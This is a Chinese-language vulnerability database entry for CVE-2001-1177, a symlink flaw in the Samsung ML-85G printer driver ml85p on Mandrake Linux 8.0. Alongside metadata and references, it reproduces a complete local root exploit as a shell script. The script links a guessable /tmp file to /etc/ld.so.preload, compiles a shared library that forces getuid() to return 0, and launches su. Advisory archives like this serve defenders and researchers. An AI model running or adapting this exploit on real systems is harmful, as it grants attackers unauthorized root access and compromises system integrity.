Samsung ML-85G GDI printer driver覆盖任意代码漏洞

Samsung ML-85G GDI printer driver覆盖任意代码漏洞

漏洞ID 1106425 漏洞类型 未知
发布时间 2001-07-10 更新时间 2005-08-17
图片[1]-Samsung ML-85G GDI printer driver覆盖任意代码漏洞-安全小百科CVE编号 CVE-2001-1177
图片[2]-Samsung ML-85G GDI printer driver覆盖任意代码漏洞-安全小百科CNNVD-ID CNNVD-200107-107
漏洞平台 Hardware CVSS评分 6.2
|漏洞来源
https://www.exploit-db.com/exploits/21000
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-107
|漏洞详情
SamsungML-85GGDIprinterdriver0.2.0之前版本ml85p存在漏洞。本地用户借助临时文件上符号链接攻击覆盖任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/3008/info
 
ml85p is a Linux driver for Samsung ML-85G series printers. It may be bundled with distributions of Ghostscript.
 
ml85p does not check for symbolic links when creating image output files.
 
These files are created in /tmp with a guessable naming format, making it trivial for attackers to exploit this vulnerability.
 
Since user-supplied data is written to the target file, attackers may be able to elevate privileges.

#!/bin/sh
# Exploit using /usr/bin/ml85p default setuid program on 
# Mandrake Linux 8.0
#
# You need to be in the sys group to be able to execute 
# ml85p.

echo "** ml85p exploit"
# set the required umask
umask 0

# get the number of seconds since 1970
DATE=`date +"%s"`
if [ ! -u /usr/bin/ml85p ] || [ ! -x /usr/bin/ml85p ]
then
	echo "** this exploit requires that /usr/bin/ml85p is setuid and 
executable."
	exit 1
fi

if [ ! -e /etc/ld.so.preload ] || [ ! -w /etc/ld.so.preload ]
then
	echo "** this exploit requires that /etc/ld.so.preload does not exist."
	exit 1
fi

echo "** creating file"
ln -s /etc/ld.so.preload /tmp/ml85g"$DATE"
echo "bleh" | /usr/bin/ml85p -s
rm /tmp/ml85g"$DATE"

echo "** creating shared library"
cat << _EOF_ > /tmp/g.c
int getuid(void) { return(0); }
_EOF_

echo "** compiling and linking shared object"
gcc -c -o /tmp/g.o /tmp/g.c
ld -shared -o /tmp/g.so /tmp/g.o
rm -f /tmp/g.c /tmp/g.o

echo "** rigging ld.so.preload"
echo "/tmp/g.so" > /etc/ld.so.preload
echo "** execute su. warning all getuid() calls will return(0) until you remove"
echo "** the line "/tmp/g.so" from /etc/ld.so.preload. removing /tmp/g.so 
without"
echo "** first fixing /etc/ld.so.preload may result in system malfunction"
su -
echo "** cleaning up"
> /etc/ld.so.preload
rm -f /tmp/g.so
|参考资料

来源:BUGTRAQ
名称:20010717SamsungML-85GPrinterLinuxHelper/DriverBinaryExploit(Mandrake:ghostscriptpackage)
链接:http://archives.neohapsis.com/archives/bugtraq/2001-07/0284.html
来源:XF
名称:samsung-printer-temp-symlink(6845)
链接:http://xforce.iss.net/static/6845.php
来源:BID
名称:3008
链接:http://www.securityfocus.com/bid/3008

相关推荐: Microburst uDirectory Remote Command Execution Vulnerability

Microburst uDirectory Remote Command Execution Vulnerability 漏洞ID 1103145 漏洞类型 Input Validation Error 发布时间 2001-06-18 更新时间 2001-06…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享